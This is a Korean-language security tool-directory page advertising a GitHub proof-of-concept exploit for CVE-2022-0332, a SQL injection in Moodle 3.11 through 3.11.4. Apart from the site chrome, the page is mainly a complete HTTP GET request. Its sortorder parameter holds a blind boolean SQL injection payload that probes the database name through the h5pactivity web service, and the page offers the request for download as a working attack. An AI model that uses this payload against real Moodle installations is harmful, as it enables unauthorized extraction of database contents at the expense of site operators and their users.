Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-0332 — CVE-2022-0332에 대한 개념 증명 익스플로잇으로, Moodle 3.11~3.11.4에 존재하는 SQL 인젝션 취약점이며, 인증 없이 데이터베이스를 추출할 수 있는 HTTP GET 페이로드를 제공합니다. | Kitploit
도구/GitHubGitHub/numanturle/cve-2022-0332
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubnumanturle/cve-2022-0332

CVE-2022-0332

CVE-2022-0332에 대한 개념 증명 익스플로잇으로, Moodle 3.11~3.11.4에 존재하는 SQL 인젝션 취약점이며, 인증 없이 데이터베이스를 추출할 수 있는 HTTP GET 페이로드를 제공합니다.

저장소 보기
46124년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-0332

Moodle 3.11 ~ 3.11.4 - SQL 주입

POC

root@kitploit:~
GET /moodle-3.11.4/webservice/rest/server.php?wstoken=98f7d8003180afbd46ee160fdc05a4fc&wsfunction=mod_h5pactivity_get_user_attempts&moodlewsrestformat=json&h5pactivityid=1&sortorder=%28SELECT%20%28CASE%20WHEN%20%28ORD%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20NCHAR%29%2C0x20%29%29%2C4%2C1%29%29%3E104%29%20THEN%20%27%27%20ELSE%20%28SELECT%205080%20UNION%20SELECT%204100%29%20END%29%29 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0
Host: local.numanturle.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


root@kitploit:~

PHP PHP PHP

참고

  • CVE-2022-0332
  • Git
도구 다운로드